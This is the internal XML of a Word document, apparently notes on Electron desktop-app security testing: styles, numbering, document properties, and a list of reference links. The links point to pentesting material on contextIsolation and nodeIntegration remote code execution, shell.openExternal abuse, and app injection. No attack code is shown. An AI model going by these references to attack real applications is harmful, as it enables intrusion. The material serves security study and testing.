      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4D8C38D1" w14:textId="77777777" w:rsidR="009B7C55" w:rsidRDefault="009B7C55" w:rsidP="00AE3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07237" w14:textId="3EE0B610" w:rsidR="00AE3B07" w:rsidRDefault="00AE3B0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DB56358" wp14:editId="0352A5C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2" name="Text Box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2F5747" w14:textId="3233E515" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07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B5635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0B2F5747" w14:textId="3233E515" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07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A3BCB" w14:textId="2A3F5D68" w:rsidR="00AE3B07" w:rsidRDefault="00AE3B0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BEF1BB2" wp14:editId="1B8BE99B">
              <wp:simplePos x="914400" y="1007364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3" name="Text Box 3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11A084" w14:textId="3B47A4F2" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07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EF1BB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2C11A084" w14:textId="3B47A4F2" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07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5F488" w14:textId="1BC2F1BE" w:rsidR="00AE3B07" w:rsidRDefault="00AE3B0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0C0D081" wp14:editId="5D6C5D6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1" name="Text Box 1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E10959" w14:textId="4B30868E" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"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C0D08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63E10959" w14:textId="4B30868E" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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AE3B07">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12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3F660" w14:textId="77777777" w:rsidR="009B7C55" w:rsidRDefault="009B7C55" w:rsidP="00AE3B07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5CD57893" w14:textId="77777777" w:rsidR="009B7C55" w:rsidRDefault="009B7C55" w:rsidP="00AE3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74E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CB4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426C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9426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9F0179"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="707E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793039"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9508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DF73D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AE64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097003">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1701204687">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="642272929">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="784466809">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="784466809">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="784466809">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="784466809">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1192649575">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="9274951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E2"/>
    <w:rsid w:val="00157AE2"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="009B7C55"/>
    <w:rsid w:val="00AE3B07"/>
    <w:rsid w:val="00B5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3A88"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4D1FE2C0-E777-46AF-9DAD-465F1F4F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E3B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E3B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E3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B07"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AE3B0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E3B0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AE3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ax-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AE3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E3B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3B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B0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rid">
    <w:name w:val="grid"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE3B07"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE3B07"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="leading-normal">
    <w:name w:val="leading-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AE3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E3B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3B07"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="flex">
    <w:name w:val="flex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE3B07"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="uppercase">
    <w:name w:val="uppercase"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE3B07"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-base">
    <w:name w:val="text-base"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AE3B07"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AE3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01083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14089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907008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386432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751909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628979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9445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334431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060260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579912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1013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807852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850309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758575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8724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793865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695773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241510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0554614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731547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5284471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2157947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68055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4341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4433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4157732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580196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90771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32181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84676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87872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09338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1343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58379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58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95746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70620045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850971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796180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568890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587068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38809275">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="18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0613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7398742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204187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297816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96290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381370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936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94486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25111740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0472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268286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336757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78483603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50633617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96134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659763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02392741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405803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54098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349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76251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34043288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283363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80719154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12106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81401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54581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221051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018909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55329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672421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ook.hacktricks.xyz/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code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www.youtube.com/watch?v=xILfQGkLXQo&amp;t=22s" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.electrovolt.io/posts/discord-rce/" TargetMode="External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book.hacktricks.xyz/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code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electro.ng/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Tzo8ucHA5xw&amp;list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&amp;index=81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enjamin-altpeter.de/shell-openexternal-dangers/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speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=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ajinabraham/nodejsscan" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/doyensec/awesome-electronjs-hacking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shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ksdmitrieva/electrolint" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://positive.security/blog/url-open-rce" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=xILfQGkLXQo&amp;t=22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7as.es/electron/nodeIntegration_rce.txt" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/doyensec/electronegativity" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=a-YnG3Mx-Tg" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.w3cub.com/electron/api/sandbox-option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2101</Words>
  <Characters>11981</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>99</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14054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Bhabesh Kumar Das</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhabesh Kumar Das</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T10:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T10:07:00Z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#626469,6,Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SetDate">
    <vt:lpwstr>2024-07-07T10:05:42Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Name">
    <vt:lpwstr>General v2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SiteId">
    <vt:lpwstr>6e51e1ad-c54b-4b39-b598-0ffe9ae68fef</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ActionId">
    <vt:lpwstr>ac8d036b-867f-4b57-ad6a-54046c50b3c7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>